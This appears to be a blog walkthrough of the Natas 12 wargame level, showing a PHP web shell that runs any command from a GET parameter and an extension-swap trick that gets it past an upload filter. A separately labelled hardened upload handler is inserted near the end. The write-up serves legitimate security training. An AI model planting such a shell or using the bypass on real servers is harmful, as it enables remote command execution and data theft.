Sunday, November 2, 2014

Natas 12


Natas 12 looks like the first chance we have to experiment with a new type of vulnerability, which relies on the fact that if we upload a PHP script instead of a JPG (and have the extension set to ".php"), the server will not just return our code to us, it will actually run it too!


If we upload a super-simple PHP script that runs whatever command we pass in the cmd GET parameter, we can now have the server execute arbitrary commands for us:
 <?php 
     // Run the command supplied in ?cmd=... and return its raw output
     passthru($_GET['cmd']); 
 ?>  

When we intercept the file upload with Burp and look at the POST request, it looks like this:


(You can see the file has been renamed, as expected given the PHP code above)

If we manually replace the ".php" extension with ".jpg", we should be able to get the server to keep the new extension!



Ok, now that we've got the PHP script uploaded, we should be able to get it to print out the password for Natas 13 like this:
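The whole level works because the server reuses whatever extension the client sends back in the form. As an added example (not part of this writeup or of the Natas source), here is a hardened PHP upload handler that never lets client input reach the stored path: the extension is derived from the sniffed image type, the name is random, and non-images are rejected. The $_FILES field name, the upload directory and the function name are assumptions.

```php
<?php
// Added example: hardened upload handler for the Natas 12 pattern.
// The flaw on the page is trusting the client-supplied extension;
// here the extension comes only from the file's actual content.

// Assumed upload directory; should be served with script execution
// disabled (or live outside the web root) as defence in depth.
const UPLOAD_DIR = __DIR__ . '/upload';

// Accepted real MIME types mapped to the extension the server assigns.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function handleUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Sniff the real content type; getimagesize() also rejects non-images.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('only JPG, PNG or GIF images are accepted');
    }

    // Random name plus server-chosen extension: nothing from the client is used.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(8)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return basename($target);
}

if (isset($_FILES['uploadedfile'])) {   // field name is an assumption
    try {
        echo 'Stored as ' . htmlspecialchars(handleUpload($_FILES['uploadedfile']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

Even with this check, a JPG with PHP embedded in its metadata stays harmless only if the upload directory cannot execute scripts, so keep that server-side restriction in place as well.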



All done!
